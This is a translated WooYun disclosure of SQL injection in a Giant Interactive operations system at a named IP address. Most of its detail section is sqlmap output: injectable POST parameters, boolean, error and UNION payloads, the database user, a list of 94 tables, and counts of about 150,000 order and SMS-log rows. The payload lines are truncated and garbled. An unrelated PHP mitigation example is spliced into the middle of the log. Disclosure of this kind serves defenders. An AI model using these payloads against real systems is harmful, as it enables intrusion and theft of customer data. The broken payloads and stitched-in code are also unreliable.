Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0169176

Title: SQL injection in a 巨人网络 (Giant Interactive) system (retest exposes 150,000 orders + 150,000 log entries)

Vendor: 巨人网络 (Giant Interactive)

Author: 牛 小 帅

Submitted: 2016-01-11 20:37

Fixed: 2016-02-22 16:48

Published: 2016-02-22 16:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2016-01-11: Details sent to the vendor, awaiting vendor action
2016-01-12: Vendor confirmed; details visible to the vendor only
2016-01-22: Details opened to core white hats and domain experts
2016-02-01: Details opened to regular white hats
2016-02-11: Details opened to intern white hats
2016-02-22: Details opened to the public

Brief description:

Detailed description:

Operations system

http://222.73.243.217/




Captured request:

POST /syswork/carryon/carryonlist.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/carryon/carryonlist.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
__EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&game_type=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11&datetext=


Multiple parameters are injectable:

Place: POST
Parameter: datetextE
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND 1919=1919
per'='aper&datetext=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND (SELECT 46
M(SELECT COUNT(*),CONCAT(0x3a786c6f3a,(SELECT (CASE WHEN (4623=4623) THEN
0 END)),0x3a6d6a6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER
GROUP BY x)a) AND 'fqTY'='fqTY&datetext=
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' UNION ALL SELE
L, NULL, NULL, CONCAT(0x3a786c6f3a,0x57437461647077797a53,0x3a6d6a6b3a), N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nogZ
Z&datetext=
Place: POST
Parameter: datetextS
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND 7224=7224 AND 'FgUt'='FgUt&date
2016-01-11&datetext=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&
ype=-1&content=1&datetextS=2016-01-11' AND (SELECT 7654 FROM(SELECT COUNT(
CAT(0x3a786c6f3a,(SELECT (CASE WHEN (7654=7654) THEN 1 ELSE 0 END)),0x3a6d
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) A
QO'='vsQO&datetextE=2016-01-11&datetext=
---
there were multiple injection points, please select the one to use for fol
injections:
[0] place: POST, parameter: datetextE, type: Single quoted string (default
[1] place: POST, parameter: datetextS, type: Single quoted string
[q] Quit
>
[18:40:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[18:40:52] [INFO] fetching current user
current user: 'uYW4Y7N27EDVL@10.240.31.6'
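As an added illustration of the bug class, not code from the reported system (carryonlist.php itself is not on the page): a date-range filter written with string concatenation, which is the shape the datetextS/datetextE payloads above exploit, beside a hardened form that validates both dates and binds them as PDO parameters. The column created_at and the connection details are assumptions.

```php
<?php
// Added example, not the reported system's code. cs_carryon is one of the
// enumerated table names above; its column created_at is assumed.

// Injectable form: the two date strings go straight into the query text, so a
// value like "2016-01-11' AND 1919=1919 AND 'aper'='aper" rewrites the WHERE
// clause, which is exactly what the boolean-based payloads above rely on.
function listCarryonVulnerable(mysqli $db, $start, $end)
{
    $sql = "SELECT * FROM cs_carryon WHERE created_at >= '$start'"
         . " AND created_at <= '$end'";
    return $db->query($sql);
}

// Hardened form, first gate: the value must be a real calendar date written
// exactly as YYYY-MM-DD. createFromFormat() fails on trailing characters such
// as a quote, and the round-trip comparison rejects rollovers like 2016-02-30.
function isIsoDate($value)
{
    if (!is_string($value)) {
        return false;
    }
    $d = DateTime::createFromFormat('!Y-m-d', $value);
    return $d !== false && $d->format('Y-m-d') === $value;
}

// Second gate: bound parameters. The dates travel to MySQL separately from the
// SQL text, so nothing in them can end the string literal or add a clause.
function listCarryonSafe(PDO $db, $start, $end)
{
    if (!isIsoDate($start) || !isIsoDate($end)) {
        throw new InvalidArgumentException('datetextS/datetextE must be YYYY-MM-DD');
    }
    $stmt = $db->prepare(
        'SELECT * FROM cs_carryon WHERE created_at >= :start AND created_at <= :end'
    );
    $stmt->bindValue(':start', $start, PDO::PARAM_STR);
    $stmt->bindValue(':end', $end, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Use native (server-side) prepares so MySQL itself does the binding instead
// of the client escaping values into the query string. DSN and credentials
// are placeholders.
function connect($dsn, $user, $pass)
{
    $db = new PDO($dsn, $user, $pass);
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    return $db;
}
```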


available databases [2]:
[*] information_schema
[*] mobilecsms


122 tables

Database: mobilecsms
[94 tables]
+---------------------------------------+
| KNOWLEDGE |
| K_SORTS |
| OPERATERECORD |
| SHIFTKNOWLEDGE |
| SHIFTOPERATERECORD |
| SK_SORTS |
| account_info_audited |
| account_info_audited_log |
| account_invoice |
| account_label |
| account_label_to_uid |
| account_lock |
| account_old_player |
| account_query_log |
| base_gm_work_field |
| base_msg_work_field |
| basic_coding |
| basic_country |
| basic_dept |
| basic_faq_sort |
| basic_game |
| basic_group |
| basic_menu |
| basic_model |
| basic_page |
| basic_resource |
| basic_resource2dept |
| basic_resource2group |
| basic_resource2user |
| basic_resourceinpage |
| basic_role |
| basic_skfaq_sort |
| basic_treenode |
| basic_user |
| basic_user2role |
| basic_user_online |
| basic_userindept |
| basic_useringroup |
| call_num |
| call_sta_time |
| cs_carryon |
| cs_coutomerinfo |
| cs_coutomerinfo_history |
| cs_dealwithorder |
| cs_dealwithorder_history |
| cs_lost_reason |
| cs_lost_reason_order |
| cs_order |
| cs_order_history |
| cs_order_invalid |
| cs_order_print |
| cs_ordertype |
| cs_overtime_sta |
| cs_overtime_standard |
| cs_overtime_standard_tt |
| cs_poll |
| cs_sta_cust_info |
| cs_sta_cust_info_tmp |
| cs_standard_reply |
| file_upload |
| game_gm_work_of_day |
| game_log_redeem |
| game_log_redeem_audit |
| game_msg_work_of_day |
| game_redeem |
| game_redeem_apply_user |
| game_redeem_audit |
| game_redeem_audit_list |
| game_redeem_audit_money |
| game_redeem_item |
| game_zone_info |
| internal_account |
| log_account_disputed |
| log_account_rollback |
| log_account_rollback_balance |
| log_fail_itil |
| log_gamerole_lock_unlock |
| order_num_alert_time |
| pilfer_account_order |
| poll_rating |
| ps_template |
| ps_template_ordertype |
| question_agreement |
| question_element |
| question_list |
| question_table |
| role_separation_info |
| self_service_config |
| send_sms_log |
| test |
| tmplog |
| uid_notcheck_pay |
| user_account_prerogative |
| user_acotype |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


Database: mobilecsms
+----------+---------+
| Table | Entries |
+----------+---------+
| cs_order | 149141 |
+----------+---------+


150,000 log entries

Database: mobilecsms
+--------------+---------+
| Table | Entries |
+--------------+---------+
| send_sms_log | 149379 |
+--------------+---------+


Proof of vulnerability:

Fix recommendation:

Copyright notice: credit the source when reposting: 牛 小 帅@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2016-01-12 11:48

Vendor reply:

Thanks, 路人甲; access to this site has been restricted.

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-01-12 13:48 | 大师兄 ( Passer-by | Rank:29 Vulns:7 | Checks WooYun every day)

    (⊙0⊙)

  2. 2016-01-12 14:31 | 404notfound ( Regular white hat | Rank:255 Vulns:70 | Preparing for grad school entrance exams, leave a message if you need me)

    How many Taiwanese ones would I have to grind to match one of your 20-rank finds?

  3. 2016-01-15 00:19 | Black Angel ( Regular white hat | Rank:165 Vulns:36 | The most amazing group of people: wise, low-key and reserved, commonly known as sock puppets...)

    Are you still selling those lobsters?